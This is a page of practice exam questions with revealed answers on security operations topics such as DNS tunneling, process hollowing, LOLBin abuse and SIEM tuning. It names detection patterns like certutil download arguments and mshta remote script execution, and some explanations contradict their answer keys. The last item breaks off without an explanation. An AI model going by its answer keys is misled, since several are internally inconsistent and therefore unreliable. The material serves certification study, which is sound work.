CCNA Cysa Security Operations Questions

75 of 165 questions · Page 2/3 · Cysa Security Operations topic · Answers revealed

76
MCQeasy

Which of the following log sources would be most useful for detecting DNS tunneling?

A.DNS logs
B.Firewall logs
C.Authentication logs
D.Endpoint EDR logs
AnswerA

DNS logs contain queries and responses needed to detect tunneling.

Why this answer

DNS tunneling exfiltrates data via DNS queries. Analyzing DNS logs for unusual query patterns or high volume is key.

77
MCQmedium

An analyst detects a process named 'powershell.exe' executing a base64-encoded command. Which type of analysis is most appropriate to decode and understand the command?

A.Process analysis
B.Memory analysis
C.Registry analysis
D.Network traffic analysis
AnswerA

Correct. Process analysis involves examining command-line arguments and decoding scripts.

Why this answer

Base64-encoded commands are common in PowerShell attacks. Decoding and analyzing the script is part of endpoint analysis, specifically process analysis.

78
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration using DNS. Which TWO indicators are most consistent with DNS tunneling?

Select 2 answers
A.Frequent NXDOMAIN responses
B.DNS responses with unusually large payload sizes
C.Unusually high volume of DNS queries to a single domain
D.Queries for domains with unusual top-level domains (e.g., .tk)
E.Multiple queries from different hosts to the same legitimate domain
AnswersB, C

Large response sizes can carry exfiltrated data.

Why this answer

DNS tunneling often uses high query volume and large response sizes to encode data. Unusual TLDs are less common; frequent NXDOMAIN may indicate DGA, not tunneling.

79
Multi-Selecthard

During a memory forensics investigation, a security analyst identifies a process that appears to have code injected into it. The process is 'explorer.exe' and its memory contains sections that are not part of the original executable. Which TWO memory analysis techniques should the analyst use to confirm code injection?

Select 2 answers
A.List the process's open handles
B.Examine the process's environment variables
C.Check the process's parent process
D.Scan for executable memory pages not backed by a file on disk
E.Compare the loaded DLL list with known good baselines
AnswersD, E

Injected code often resides in memory without a corresponding file.

Why this answer

Comparing the process's loaded DLL list with the expected list can reveal anomalies. Checking for executable memory pages that are not backed by a known module is another indicator.

80
MCQmedium

A security analyst is investigating an alert from the EDR tool indicating that a process named 'powershell.exe' was launched with a parent process 'winword.exe'. The user's workstation had received a phishing email earlier that day. Which type of attack does this likely indicate?

A.Process hollowing
B.Living off the land binary (LOLBin) abuse
C.Injection of code into explorer.exe
D.Scheduled task creation
AnswerB

PowerShell is a LOLBin, and being spawned by Word indicates macro-based attack.

Why this answer

The parent-child relationship of winword.exe spawning powershell.exe is a classic indicator of a malicious macro executing PowerShell code, often used in phishing attacks.

81
MCQmedium

A cloud security analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The instance is part of an auto-scaling group. What is the best immediate action?

A.Isolate the instance by modifying its security group to deny all traffic.
B.Terminate the instance immediately to stop the threat.
C.Ignore the alert because auto-scaling groups are ephemeral.
D.Update the GuardDuty threat list to ignore that IP.
AnswerA

Correct. Isolation stops communication while preserving the instance for forensic analysis.

Why this answer

Isolating the instance by removing it from the security group or using a quarantine VPC prevents further communication while preserving forensic data.

82
MCQmedium

An analyst is investigating an alert from AWS GuardDuty that indicates an EC2 instance is communicating with a known malicious IP address. The analyst checks the VPC Flow Logs and confirms the communication. What is the next best step in the investigation?

A.Run a vulnerability scan on the instance.
B.Ignore the alert because GuardDuty often produces false positives.
C.Isolate the EC2 instance from the network.
D.Delete the EC2 instance immediately.
AnswerC

Isolation stops the communication and allows for further investigation without destroying data.

Why this answer

Since the EC2 instance is compromised, isolating it (e.g., by modifying security groups or stopping the instance) prevents further malicious activity while preserving evidence.

83
MCQmedium

A security analyst notices repeated alerts for 'DNS query to known malicious domain' from multiple internal hosts. Upon investigation, the analyst finds that the domain is legitimate and used by a third-party service. What should the analyst do to reduce false positives?

A.Add the domain to a whitelist in the SIEM
B.Disable the alert rule for DNS queries
C.Increase the severity of the alert
D.Block the domain on the firewall
AnswerA

Whitelisting prevents false positives for known legitimate domains.

Why this answer

Adding the domain to a whitelist ensures that legitimate traffic is not flagged, reducing false positives without disabling the rule entirely.

84
MCQhard

An analyst is investigating a potential compromise on a Windows endpoint. EDR telemetry shows that 'powershell.exe' was launched by 'svchost.exe', which in turn was spawned by 'services.exe'. The analyst observes that 'powershell.exe' then executed a script that downloaded an executable. What should the analyst be most concerned about?

A.Services.exe spawning svchost.exe is a sign of malware infection
B.Powershell.exe downloading an executable is a false positive from Windows Update
C.This indicates a potential LOLBin attack using svchost.exe to launch powershell.exe
D.Svchost.exe spawning powershell.exe is a normal Windows operation
AnswerC

Attackers use svchost.exe as a parent to evade detection, a common LOLBin technique.

Why this answer

Svchost.exe hosting a child process like powershell.exe is unusual. This parent-child relationship suggests a LOLBin (living off the land) attack, where an attacker abuses legitimate Windows binaries to execute malicious code. The script download further indicates compromise.

85
MCQmedium

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The server is behind a WAF that blocks the attack vector. The system owner states the vulnerability is not exploitable due to the compensating control. Which of the following is the best next step?

A.Re-run the scan with a non-credentialed profile
B.Document the finding and accept the risk with the compensating control
C.Ignore the vulnerability and close the finding
D.Immediately patch the server during business hours
AnswerB

Correct. The vulnerability is mitigated by the WAF, so risk acceptance with documentation is appropriate.

Why this answer

If a compensating control mitigates the risk, the vulnerability can be accepted as a false positive in the scanning context, but it should be documented and the control verified.

86
Multi-Selecteasy

A security analyst is tuning a SIEM correlation rule that triggers on failed login attempts. The rule is generating a high number of alerts from a specific user who frequently mistypes passwords. The analyst wants to reduce false positives while maintaining detection of brute-force attacks. Which TWO actions should the analyst take?

Select 2 answers
A.Delete the correlation rule and create a new one from scratch
B.Exclude the specific user account from the rule
C.Increase the threshold of failed attempts within a time window
D.Change the rule to alert on every single failed login
E.Increase the severity of the rule to trigger an immediate response
AnswersB, C

Excluding the known user eliminates false positives from that account.

Why this answer

Increasing the threshold to require more failed attempts in the time window helps ignore simple mistypes, and excluding the specific user account from the rule prevents alerts for that benign behavior.

87
MCQhard

An analyst is reviewing a YARA rule that triggers on a specific string pattern in memory. The rule has a high false positive rate. Which of the following actions would best reduce false positives while maintaining detection capability?

A.Add a condition that requires the string to appear with another indicator
B.Convert the rule to a Sigma rule
C.Remove the rule from active use
D.Increase the string length in the rule
AnswerA

Using multiple conditions makes the rule more specific.

Why this answer

Adding conditions to refine the rule, such as requiring the string to be in a specific memory section or alongside other indicators, can reduce false positives.

88
MCQmedium

A security analyst notices that a firewall log shows outbound traffic from an internal server to an external IP address on TCP port 443, but the server is not configured to make any outbound connections. The analyst checks previous logs and finds similar connections every 60 minutes. What type of activity is most likely occurring?

A.Beaconing to a command-and-control server
B.Normal software update check
C.DNS tunneling
D.Data exfiltration via FTP
AnswerA

Beaconing involves periodic connections to a C2 server, often on port 443 to blend in with HTTPS traffic.

Why this answer

Regular check-ins to an external IP on a common port like 443 is typical of beaconing to a C2 server.

89
MCQmedium

An analyst is investigating a potential data exfiltration via DNS. Which tool would best help identify DNS tunnelling by analyzing packet payloads and query patterns?

A.Wireshark
B.tcpdump
C.nmap
D.NetFlow
AnswerA

Correct. Wireshark captures full packets for deep analysis.

Why this answer

Wireshark can capture and analyze DNS packets in detail, including payload and query patterns, making it suitable for detecting DNS tunnelling.

90
MCQmedium

A vulnerability scan report shows a critical vulnerability with a CVSS score of 9.8 on an internal web server. The server is not internet-facing and is protected by a compensating control: a web application firewall (WAF) that blocks the attack vector. What should the analyst recommend?

A.Schedule an immediate emergency patch
B.Remove the WAF to ensure the vulnerability is addressed
C.Document the compensating control and reduce the risk rating
D.Ignore the finding because it is a false positive
AnswerC

Proper risk management involves documenting controls and adjusting risk.

Why this answer

The vulnerability has a high CVSS score, but the compensating control (WAF) reduces the risk. The analyst should document the control and adjust the risk rating rather than patching immediately if patching would cause downtime.

91
MCQhard

An analyst is reviewing a packet capture and observes a series of TCP SYN packets sent to a server, each followed by a SYN-ACK from the server, but no ACK from the client. The source IP is spoofed. What type of attack is most likely occurring?

A.Man-in-the-middle attack
B.DNS amplification attack
C.TCP SYN flood attack
D.TCP reset attack
AnswerC

The pattern of SYN, SYN-ACK, and no ACK from spoofed IPs is classic SYN flood.

Why this answer

A SYN flood attack involves sending many SYN packets with spoofed IPs, causing the server to allocate resources for half-open connections. The lack of final ACK indicates the client never completes the handshake, exhausting server resources.

92
MCQmedium

A security analyst is triaging a SIEM alert for 'Multiple failed logins followed by a successful login from a remote IP'. The successful login occurs after 10 failed attempts. What is the most likely classification?

A.True positive for a brute-force attack
B.False positive due to a misconfigured application
C.False positive due to user error
D.True positive for a password spraying attack
AnswerA

Correct. This is indicative of a brute-force attack.

Why this answer

The pattern of multiple failures followed by a success strongly indicates a successful brute-force attack, which is a true positive.

93
Multi-Selecthard

A security analyst is using osquery to hunt for persistence mechanisms on a Windows endpoint. Which THREE Windows artifacts should the analyst query to identify common persistence locations? (Select THREE.)

Select 3 answers
A.Scheduled tasks in the Task Scheduler
B.Windows Event Logs for login events
C.Network connections from the endpoint
D.Registry key: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
E.Services listed in the Service Control Manager
AnswersA, D, E

Correct. Scheduled tasks are a common persistence mechanism.

Why this answer

Registry Run keys (T1547.001), scheduled tasks (T1053.005), and services (T1543.003) are common persistence mechanisms. Startup folders are also common but are not listed as a separate option here; the three listed are correct.

94
MCQmedium

An analyst is investigating a suspicious email attachment. The sandbox analysis shows that the document drops a binary that connects to an external IP on port 4444. Which network analysis tool is best suited to confirm if any internal hosts are communicating on that port?

A.tcpdump
B.nmap
C.Wireshark
D.NetFlow analyzer
AnswerD

NetFlow provides aggregated flow records, enabling quick searches for traffic on a specific port.

Why this answer

NetFlow collects metadata about network flows, including destination IP and port, enabling analysts to query for all traffic on a specific port across the network.

95
MCQmedium

A SOC analyst receives an alert from the SIEM indicating a high volume of outbound traffic from a single workstation to an external IP address on port 22. Upon investigation, the analyst finds the workstation is used by a developer who frequently transfers large files to a remote server via SCP. What is the most appropriate classification for this alert?

A.True positive
B.True negative
C.False positive
D.False negative
AnswerC

The alert is triggered by legitimate SCP transfers.

Why this answer

The alert is triggered by legitimate administrative activity (SCP file transfer), so it is a false positive. The analyst should tune the SIEM to reduce similar alerts.

96
MCQmedium

During a traffic analysis, a security analyst observes repeated outbound connections from an internal workstation to an external IP address on TCP port 53 at irregular intervals. The connections are small and occur every few minutes. Which technique is most likely being used?

A.HTTP smuggling
B.TCP handshake anomaly
C.DNS tunneling
D.Beaconing
AnswerC

Using TCP port 53 for data exfiltration is characteristic of DNS tunneling.

Why this answer

DNS normally uses UDP, but TCP port 53 can be used for DNS tunneling. The small, irregular connections to a single external IP suggest data exfiltration via DNS tunneling.

97
MCQmedium

A CASB alert indicates that a user downloaded a file containing sensitive data from a cloud app to an unmanaged device. Which action should the analyst take first?

A.Report the incident to law enforcement
B.Reset the user's password
C.Block the user's cloud app access
D.Investigate the alert to confirm the data exfiltration
AnswerD

Confirmation is necessary before taking action.

Why this answer

The first step is to verify the alert is a true positive by checking the user's activity and the file's sensitivity. Prematurely blocking or reporting may be incorrect if the alert is a false positive.

98
MCQmedium

During a network traffic analysis, a security analyst observes repeated connections from an internal host to an external IP address on TCP port 53. The traffic volume is low but consistent. What type of anomaly is most likely indicated?

A.Data exfiltration via DNS tunneling
B.Lateral movement using SMB
C.Port scan activity from an internal host
D.Beaconing to a command-and-control server
AnswerA

DNS tunneling uses port 53 and is a common data exfiltration technique, consistent with the pattern observed.

Why this answer

DNS tunneling often uses port 53 to exfiltrate data by encoding it in DNS queries. The consistent low-volume traffic to a single external IP suggests covert communication.

99
Multi-Selectmedium

An analyst is creating a Sigma rule to detect suspicious use of rundll32.exe to execute DLL files from temporary directories. Which TWO fields should the analyst include in the rule to minimize false positives?

Select 2 answers
A.File Size: > 1 MB
B.Parent Process: explorer.exe
C.Process Name: rundll32.exe
D.Image Path: C:\Windows\System32\rundll32.exe
E.Command Line: contains *\Temp\*.dll
AnswersC, E

Targeting rundll32.exe reduces false positives from other processes.

Why this answer

To avoid false positives, the rule should specify the process name (rundll32.exe) and the command-line argument containing a path to a temp directory, as legitimate uses rarely involve DLLs from temp folders.

100
Multi-Selectmedium

During a cloud security investigation, a security analyst notices unusual API calls from a compromised IAM user in AWS. The analyst wants to determine the scope of the breach and identify affected resources. Which TWO cloud-native services should the analyst use?

Select 2 answers
A.AWS Shield
B.AWS CloudTrail
C.AWS WAF
D.AWS Config
E.Amazon GuardDuty
AnswersB, E

CloudTrail logs all API calls and is essential for auditing user activity.

Why this answer

AWS CloudTrail records API activity, and GuardDuty provides threat detection. Both are native services for investigation.

101
MCQeasy

A security analyst is reviewing a SIEM alert that triggered on a single failed login attempt from an internal IP address to a domain controller at 3:00 AM. The user associated with the account is on vacation. Which classification best describes this alert?

A.False positive
B.False negative
C.True negative
D.True positive
AnswerD

The alert correctly identified a real security event.

Why this answer

The alert is triggered by a real failed login attempt from an internal IP, but the user is on vacation, so it likely indicates a malicious attempt. Since it is a confirmed security incident, it is a true positive.

102
MCQhard

During memory analysis of a compromised host, an analyst finds a process that appears to be 'svchost.exe' but with an unusual parent process (not 'services.exe'). The process also has injected code in its memory. What is the most likely explanation?

A.The process is a legitimate svchost.exe but spawned by a different service
B.The svchost.exe is a hollowed process used for malicious purposes
C.The process is a DLL injection into svchost.exe
D.The svchost.exe process is a false positive due to a known Windows bug
AnswerB

Correct. Process hollowing replaces legitimate process memory.

Why this answer

Svchost.exe should always have services.exe as parent. A different parent suggests process hollowing where an attacker replaced the legitimate process memory.

103
MCQmedium

A cloud security analyst reviews AWS CloudTrail logs and notices multiple 'RunInstances' API calls from a single IAM user creating EC2 instances with public IP addresses in an unusual region. What is the most likely concern?

A.The user's credentials may be compromised and used for cryptomining
B.The user is performing legitimate scaling operations
C.The user is provisioning resources for a new project
D.The user is testing disaster recovery procedures
AnswerA

Cryptominers often use compromised accounts to launch instances in regions with cheap compute resources.

Why this answer

Creating instances in unusual regions with public IPs could indicate compromised credentials being used for cryptomining or other malicious activity.

104
MCQmedium

An analyst reviews AWS CloudTrail logs and detects multiple 'CreateNetworkAclEntry' API calls from a user who does not typically perform network administration. What type of activity is this?

A.Cloud misconfiguration
B.Privilege escalation or lateral movement
C.Normal administrative activity
D.Data exfiltration via NACL
AnswerB

Correct. Unauthorized network changes could indicate privilege escalation.

Why this answer

Unusual API calls from a user outside their normal role may indicate privilege abuse or a compromised account.

105
MCQmedium

An analyst is creating a YARA rule to detect a specific malware family that uses the string 'evil' in its PE file. Which of the following rule structures is correct?

A.rule detect_malware { strings: $a = "evil" condition: $a }
B.rule detect_malware { strings: "evil" condition: $a }
C.rule detect_malware { condition: $a = "evil" }
D.if "evil" in file then alert
AnswerA

Correct structure: rule name, strings section with identifier, condition using identifier.

Why this answer

The standard YARA rule structure includes rule name, meta section, strings section, and condition section. The condition must reference the string.

106
Multi-Selectmedium

A security team is tuning a SIEM rule that alerts on all outbound connections to IP addresses classified as 'high risk' by threat intelligence. The rule generates many false positives because some legitimate services use these IPs. Which two actions should the analyst take to reduce false positives? (Select TWO.)

Select 2 answers
A.Ignore the false positives and continue
B.Increase the risk score threshold to only alert on very high risk IPs
C.Expand the rule to include all risky IPs
D.Add known legitimate IP addresses to an exclusion list
E.Disable the rule
AnswersB, D

Raising the threshold reduces alerts from borderline IPs.

Why this answer

Allowlisting known legitimate IPs (A) and increasing the risk threshold (D) reduce false positives without disabling the rule. Disabling the rule (B) removes detection, ignoring alerts (C) is not proper tuning, and expanding to all risky IPs (E) would increase false positives.

107
MCQmedium

During a threat hunting exercise, the hunter creates a hypothesis based on recent threat intelligence about a new ransomware variant that uses scheduled tasks for persistence. Which ATT&CK technique should the hunter focus on?

A.T1566.001 (Spearphishing Attachment)
B.T1059.001 (PowerShell)
C.T1053.005 (Scheduled Task)
D.T1547.001 (Registry Run Keys)
AnswerC

Correct. This is the ATT&CK technique for persistence via scheduled tasks.

Why this answer

Scheduled tasks are a persistence technique (T1053.005). The hunter should focus on the persistence tactic and the specific technique for scheduled tasks.

108
MCQhard

An analyst is reviewing a memory dump from a compromised workstation and finds a process that appears to be a legitimate system process but has a different parent process and is running from a non-standard location. Which analysis technique is most appropriate?

A.Perform a YARA scan on the process memory
B.Compare the process's command line with baseline
C.Analyze network connections from the process
D.Check the process's digital signature
AnswerA

YARA rules can detect malicious code injected into the process memory, even if the binary itself is signed.

Why this answer

Process hollowing is a technique where an attacker creates a legitimate process in a suspended state, replaces its memory with malicious code, and resumes it. The process may appear legitimate but with anomalies in parent and path.

109
MCQhard

An analyst suspects a process hollowing attack on an endpoint. Which of the following EDR telemetry findings would best support this hypothesis?

A.A legitimate process (e.g., svchost.exe) created in a suspended state and later resumed with changed memory contents
B.A process with the same name as a Windows system process but running from a temporary directory
C.A process injecting code into a legitimate running process
D.An unknown process making network connections to multiple internal IPs
AnswerA

Creation in suspended state with memory modification is classic hollowing indicator.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, then replacing its memory with malicious code. This leaves the original path unchanged but the process may exhibit unusual child process behavior.

110
Multi-Selecthard

A security analyst is investigating a potential advanced persistent threat (APT) that uses living off the land binaries (LOLBins). The EDR has flagged several processes. Which THREE process behaviors are most indicative of LOLBin abuse? (Choose THREE.)

Select 3 answers
A.mshta.exe executing JavaScript from a remote URL
B.explorer.exe opening the Start menu
C.notepad.exe opening a .txt file in the user's Documents folder
D.wmic.exe creating a process on a remote system
E.certutil.exe downloading an executable from a remote server
AnswersA, D, E

Correct. MSHTA can run scripts, often used by attackers.

Why this answer

LOLBin abuse often involves using native tools in unusual ways: wmic for remote execution, mshta for executing malicious scripts, and certutil for downloading payloads. Bitsadmin is also used, but it's less common.

111
MCQhard

During a threat hunting engagement, an analyst creates a hypothesis based on a recent threat intelligence report about a new APT group using DLL side-loading for persistence. The analyst decides to search for processes that have loaded a known vulnerable DLL. Which framework is most appropriate to map the TTPs?

A.Diamond Model
B.NIST CSF
C.MITRE ATT&CK
D.Cyber Kill Chain
AnswerC

ATT&CK provides a detailed taxonomy of techniques used by APT groups.

Why this answer

MITRE ATT&CK is the most comprehensive framework for mapping adversary TTPs, including persistence techniques like DLL side-loading (T1574.002).

112
MCQhard

An analyst is investigating a suspected data exfiltration via HTTP. The analyst examines a PCAP file and finds a series of HTTP POST requests to an external site with varying 'Content-Length' values. The payloads appear to be base64-encoded strings. Which tool would be most effective for extracting and decoding the payloads for analysis?

A.Wireshark
B.Python with scapy
C.tcpdump
D.NetFlow
AnswerB

Scapy allows programmatic extraction of HTTP payloads and base64 decoding, making it ideal for this task.

Why this answer

Python with scapy allows custom scripting to extract and decode payloads from PCAP files.

113
MCQmedium

During a memory analysis of a potentially compromised host, a security analyst finds a process with an executable image that is not present on disk. Which technique is most likely being observed?

A.Reflective DLL injection
B.Process hollowing
C.API hooking
D.DLL injection
AnswerB

Process hollowing replaces the process memory with malicious code, causing the executable to be memory-only.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, then replacing its memory with malicious code, so the executable in memory may not correspond to a file on disk.

114
MCQmedium

A security analyst is creating a Sigma rule to detect suspicious usage of 'schtasks.exe' to create a scheduled task that runs an encoded PowerShell command. Which log source is most appropriate for this rule?

A.Windows Security Event Log (Event ID 4624)
B.Sysmon Event ID 1 (Process creation)
C.DNS server log
D.Windows PowerShell operational log
AnswerB

Correct. Sysmon Event ID 1 captures process creation with command line.

Why this answer

Sigma rules are written for log sources. Process creation logs (e.g., Event ID 4688 or Sysmon Event ID 1) capture command-line arguments.

115
MCQmedium

A security analyst is reviewing a SIEM alert indicating a high number of failed authentication attempts from a single IP address against multiple user accounts. The analyst checks the logs and finds the IP belongs to a known vulnerability scanner used by the internal security team. How should the analyst classify this alert?

A.True positive - unauthorized access attempt
B.False positive - authorized activity
C.True positive - lateral movement
D.False negative - missed detection
AnswerB

The activity is legitimate and should be classified as a false positive.

Why this answer

The alert is triggered by authorized activity from a known internal scanner, so it is a false positive. The SIEM rule should be tuned to exclude this scanner or reduce its severity.

116
MCQeasy

A vulnerability scan report shows a critical vulnerability with a CVSS score of 10.0. The application team states that the affected service is isolated in a DMZ and has no access to sensitive data. What should the analyst consider?

A.Accept the risk based on compensating controls
B.Reclassify the vulnerability as low severity
C.Immediately patch the vulnerability
D.Ignore the finding as a false positive
AnswerA

The isolation in the DMZ serves as a compensating control, reducing the likelihood of exploitation.

Why this answer

Compensating controls like network isolation can reduce the risk even if the vulnerability itself is critical.

117
Multi-Selectmedium

During a threat hunt, an analyst is looking for signs of lateral movement using pass-the-hash. Which three of the following log sources would be most useful for detecting this technique?

Select 3 answers
A.DNS query logs
B.Sysmon Event ID 3 (network connection)
C.Domain controller authentication logs
D.Sysmon Event ID 1 (process creation)
E.Windows Security Event Log (Event ID 4624)
AnswersB, C, E

Network connections from a host to many others can indicate lateral movement.

Why this answer

Pass-the-hash involves using NTLM hashes to authenticate. Windows Event ID 4624 (successful logon) can show logon type 3 (network) with unusual source IPs. Sysmon Event ID 3 (network connection) can show outbound connections.

Authentication logs on domain controllers show NTLM authentication attempts.

118
Multi-Selectmedium

A security analyst is creating a SIEM correlation rule to detect lateral movement using pass-the-hash attacks. The rule should trigger when multiple successful logins occur from a single source to multiple destinations using NTLM authentication. Which THREE log sources are essential for this rule? (Choose THREE.)

Select 3 answers
A.Windows Event ID 4776 (NTLM authentication) logs from domain controllers
B.Windows Event ID 4624 (Logon) logs from workstations
C.DNS logs from the internal DNS server
D.Firewall logs showing outbound connections
E.Authentication logs from the source machine showing logon type 3
AnswersA, B, E

Correct. These capture NTLM authentication attempts.

Why this answer

Windows Event IDs 4624 (successful logon) and 4776 (NTLM authentication) are key. Authentication logs on domain controllers also capture NTLM events.

119
MCQmedium

An EDR alert shows that a process named svchost.exe with parent process cmd.exe executed a PowerShell command to create a scheduled task. The scheduled task runs a script from a remote share. What should the analyst suspect?

A.Lateral movement via scheduled tasks
B.Normal administrative activity
C.Memory injection attack
D.Persistence mechanism using a LOLBin
AnswerD

Correct. Scheduled tasks are a common persistence method, and svchost.exe is abused as a LOLBin.

Why this answer

The parent-child relationship is abnormal: svchost.exe should not have cmd.exe as its parent. This indicates a living off the land (LOLBin) technique using svchost.exe to execute malicious code.

120
MCQmedium

A security analyst is creating a correlation rule in the SIEM to detect DGA (Domain Generation Algorithm) activity. Which of the following data points would be most useful to include in the rule?

A.High number of DNS queries to domains with high entropy and frequent NXDOMAIN responses
B.Multiple successful connections to a single external IP
C.Large data transfers over HTTPS
D.Unusual parent-child process relationships
AnswerA

These are classic indicators of DGA.

Why this answer

DGA domains are algorithmically generated and often have high entropy, frequent NXDOMAIN responses (because the domain may not yet be registered), and are rarely seen in the environment.

121
MCQmedium

A security analyst is configuring a vulnerability scanner to assess internal servers. The goal is to identify missing patches and misconfigurations without impacting system performance. Which scan configuration is most appropriate?

A.Non-credentialed external scan
B.Full port scan with vulnerability detection
C.Credentialed internal scan
D.Agent-based scan with performance throttling
AnswerC

Credentialed scans provide comprehensive results with minimal impact on performance.

Why this answer

A credentialed scan uses authenticated credentials to access the target, allowing deeper checks for missing patches and misconfigurations without intrusive techniques. This provides accurate results with less impact than non-credentialed scans that might cause crashes.

122
MCQmedium

During a traffic analysis, a security analyst notices repeated TCP SYN packets sent to an internal server from an external IP, but the server never responds with SYN-ACK. The external IP sends a new SYN packet every 30 seconds. What does this behavior most likely indicate?

A.A SYN flood attack
B.A misconfigured firewall dropping SYN-ACK packets
C.A TCP port scan
D.A half-open connection due to network latency
AnswerC

Repeated SYN packets to the same destination without response is typical of a port scan seeking open ports.

Why this answer

The lack of SYN-ACK responses suggests the server is not reachable or the port is closed. Repeated SYN packets without response are characteristic of a TCP port scan, as the scanner waits for a timeout and retries.

123
MCQeasy

Which analysis technique involves examining the parent-child relationships of processes to identify potentially malicious activity?

A.Network analysis
B.Memory analysis
C.Registry analysis
D.Process analysis
AnswerD

Process analysis includes examining process trees and parent-child relationships to detect suspicious behavior.

Why this answer

Process analysis looks at process trees to find anomalies like a word processor spawning a command shell.

124
Multi-Selectmedium

A security analyst is creating a Sigma rule to detect use of the LOLBin 'certutil' for downloading payloads. Which THREE command-line arguments should the rule look for to indicate malicious use?

Select 3 answers
A.-urlcache
B.-split
C.-encode
D.-decode
E.-verify
AnswersA, B, D

Used to download files from a URL.

Why this answer

Certutil can be abused to download files using the '-urlcache' and '-split' arguments (or '-f' for force). The combination of '-urlcache' with a URL and output file is typical for downloading malicious payloads. '-verify' is legitimate, '-encode' and '-decode' are used for encoding/decoding, but '-urlcache' and '-split' are key for download.

125
MCQhard

An analyst is investigating a memory dump of a compromised system and finds a process that appears to be running inside another process's memory space, with no associated executable on disk. Which technique best describes this finding?

A.Process hollowing
B.Reflective DLL injection
C.API hooking
D.DLL injection
AnswerA

Correct. Process hollowing replaces the legitimate process's code with malicious code without writing a file to disk.

Why this answer

Process hollowing involves creating a legitimate process in a suspended state, replacing its memory with malicious code, and resuming it. The absence of an on-disk executable is a key indicator.

126
MCQeasy

An organization wants to perform vulnerability scanning on internal servers that contain sensitive data. The scanning team is concerned about causing service disruptions. Which type of scan should be recommended to minimize risk?

A.Agent-based scan
B.Non-credentialed scan
C.Credentialed scan with safe checks enabled
D.External scan from the internet
AnswerB

Correct. Non-credentialed scans are less likely to impact services.

Why this answer

Non-credentialed scans are less intrusive and less likely to cause service disruptions because they do not log into the target systems.

127
Multi-Selecthard

An analyst is investigating a potential data exfiltration incident. The analyst observes repeated HTTPS connections to a cloud storage provider from a server that does not normally use that service. Which three additional artifacts would strengthen the case for exfiltration?

Select 3 answers
A.The data transfer volume is significantly higher than normal for that server
B.The connections are occurring during non-business hours
C.The connections are made to a known malicious IP
D.The connections occur during business hours only
E.The server is using a non-standard port for HTTPS (e.g., 8080)
AnswersA, B, E

Unusually high data volume is a strong indicator.

Why this answer

Large outbound data volume, connections outside business hours, and use of non-standard ports (e.g., 443 for https but custom port for tunneling) are classic exfiltration indicators.

128
MCQeasy

A security analyst is configuring a vulnerability scanner to evaluate the security posture of internal servers. Which type of scan provides the most accurate assessment of missing patches?

A.Network-based scan without credentials
B.Non-credentialed external scan
C.Credentialed internal scan
D.Agent-based scan
AnswerC

Credentialed scans have access to system patch information.

Why this answer

Credentialed scans authenticate to the target OS and can query patch levels directly, yielding more accurate results than uncredentialed scans.

129
MCQhard

An analyst examines a memory dump from a compromised host and finds that 'svchost.exe' is executing code from a memory region that is not backed by any executable file. What technique is most likely being used?

A.Reflective DLL injection
B.API hooking
C.Process hollowing
D.DLL injection
AnswerC

Process hollowing creates a process in a suspended state and replaces its memory with malicious code, matching the finding of code without a file backing.

Why this answer

Hollowing involves replacing a legitimate process's memory with malicious code, leaving no corresponding file on disk.

130
MCQeasy

During a vulnerability scan of an internal web server, the scanner reports a critical vulnerability with a CVSS score of 9.8. The analyst reviews the finding and determines that the vulnerability is mitigated by a Web Application Firewall (WAF) deployed in front of the server. What should the analyst do with this finding?

A.Mark the finding as a false positive and close it.
B.Immediately patch the server to remove the vulnerability.
C.Document the compensating control and track the finding until patched.
D.Increase the scan frequency to detect if the vulnerability changes.
AnswerC

Correct. The vulnerability is real but mitigated; it should be tracked with the compensating control noted.

Why this answer

The vulnerability is effectively mitigated by the compensating control (WAF), so it should be documented as such and tracked until the patch is applied.

131
MCQmedium

During a network traffic analysis, a security analyst observes repeated TCP SYN packets sent to a host that responds with SYN-ACK, but the connection never completes. What type of anomaly is this?

A.DNS amplification
B.SYN flood
C.ARP spoofing
D.Port scan
AnswerB

Repeated SYNs without final ACK indicate a SYN flood DoS attack.

Why this answer

A half-open TCP handshake (SYN flood) is a common DoS technique where the attacker sends many SYN packets without completing the handshake, exhausting server resources.

132
MCQeasy

A security analyst is reviewing logs from multiple sources to investigate a potential intrusion. Which log source would provide the most reliable evidence of successful authentication from an unusual location?

A.Endpoint detection and response (EDR) logs
B.Firewall logs
C.Authentication logs
D.DNS logs
AnswerC

Authentication logs directly record login attempts and outcomes.

Why this answer

Authentication logs record login events including source IP, timestamp, and success/failure status, making them the best source for identifying successful authentication from unusual locations.

133
Multi-Selectmedium

A security analyst is investigating a potential data exfiltration incident. The analyst observes the following network traffic from an internal host: Outbound connections to an external IP on port 22, large data transfers during off-hours, and the use of SCP. Which two indicators of compromise (IOCs) are most relevant? (Select TWO.)

Select 2 answers
A.Frequent DNS queries
B.HTTP POST requests
C.Large outbound data transfers during off-hours
D.Use of SCP on port 22
E.ICMP echo requests
AnswersC, D

Off-hours transfers are suspicious.

Why this answer

Port 22 (SSH) and SCP (Secure Copy) are commonly used for data exfiltration. Large data transfers off-hours are also suspicious. Both A and C are direct IOCs.

B (DNS tunneling) is not indicated, D (ICMP tunneling) is not shown, E (HTTP traffic) is not mentioned.

134
MCQeasy

A security analyst is reviewing NetFlow data and notices a significant amount of traffic from an internal host to a known malicious IP address on port 443. What tool would be most effective for further analyzing the payload of this traffic?

A.Nikto
B.Wireshark
C.Nmap
D.tcpdump
AnswerB

Wireshark provides detailed packet inspection and payload analysis.

Why this answer

Wireshark captures and analyzes packet payloads, which is necessary for examining the content of encrypted or unencrypted traffic.

135
MCQeasy

Which of the following is the primary purpose of log normalisation in a SIEM?

A.Encrypt logs to protect confidentiality
B.Reduce storage space by compressing log data
C.Remove false positives from log entries
D.Convert logs into a standardised format for correlation and analysis
AnswerD

Normalisation ensures consistent field names and values across diverse log sources.

Why this answer

Log normalisation converts logs from different sources into a common, structured format so that the SIEM can correlate and analyse them uniformly.

136
MCQhard

A security analyst uses Wireshark to capture traffic and notices an unusually high number of DNS queries for random-looking subdomains under a single domain, such as 'a1b2c3.malicious.com'. The TTL values are very low. The analyst suspects DNS tunneling. Which of the following additional indicators would most strongly support this hypothesis?

A.Large number of NXDOMAIN responses
B.DNS queries with unusually large TXT record response sizes
C.High number of A record queries
D.Queries originating from a DNS server
AnswerB

Correct. Large TXT records are a common sign of data exfiltration via DNS tunneling.

Why this answer

